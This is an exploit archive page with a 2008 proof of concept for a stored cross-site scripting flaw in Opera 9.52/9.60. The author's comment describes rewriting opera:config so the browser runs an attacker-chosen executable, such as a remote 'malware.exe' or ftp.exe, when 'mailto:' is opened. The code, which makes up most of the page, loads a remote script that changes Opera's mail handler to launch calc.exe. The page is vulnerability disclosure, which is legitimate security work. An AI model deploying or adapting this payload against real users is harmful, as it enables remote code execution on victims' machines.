Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : ExploitAlert

  Topic : Opera 9.52/9.60 Stored Cross Site Scripting Code Exec PoC
  ExploitAlert : 5002
  Milw0rm ID : 6813
  Credit : Aviv
  Date : 28.10.2008

  Download

  Exploit Code :  

<!--
Just found a way to use Stefanoâ&#65533;&#65533;s opera:config idea to
execute code from remote.

Instead of changing the HTTP Proxy, an attacker can change the default
external
mail application to â&#65533;&#65533;\\evil\malware.exe â&#65533;&#65533;,
or to local commands (e.g. ftp.exe
which can be used to download malicious binaries from remote). Also, there
is a
need to change the â&#65533;&#65533;Mail Handlerâ&#65533;&#65533; settings
to â&#65533;&#65533;2â&#65533;&#65533;, so opera will execute the
external mail application, instead of the default opera mail application.

After changing the settings, the attacker can simply set the location to
â&#65533;&#65533;mailto:â&#65533;&#65533; to execute the code.


A proof-of-concept which executes the Windows Calculator can be found here:
http://raffon.net/research/opera/history/op.html


Cheers,

--Aviv.

http://aviv.raffon.net
-->

<html>
<title>bb</title>
<script>
var z=null;
function x() {

window.setTimeout("z=window.open('opera:historysearch?q=%2A');window.focus(
);",1500);
window.setTimeout("z.close();",3000);
window.setTimeout("location.href='mailto:'",3000);
}
</script>
<body>
<a href="#<script
src='http://www.raffon.net/research/opera/history/o.js'></script>"
onclick="x()">Click me...</a>
</body>
</html>

<o.js>
s=document.createElement("IFRAME");
s.src="opera:config";
document.body.appendChild(s);
s.src="javascript:opera.setPreference('Mail','External
Application','c:\\\\windows\\\\system32\\\\calc.exe');opera.setPreference('
Mail','Handler','2');parent.window.close()";
</o.js>



Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass

Copyright © SecurityReason. All Rights Reserved.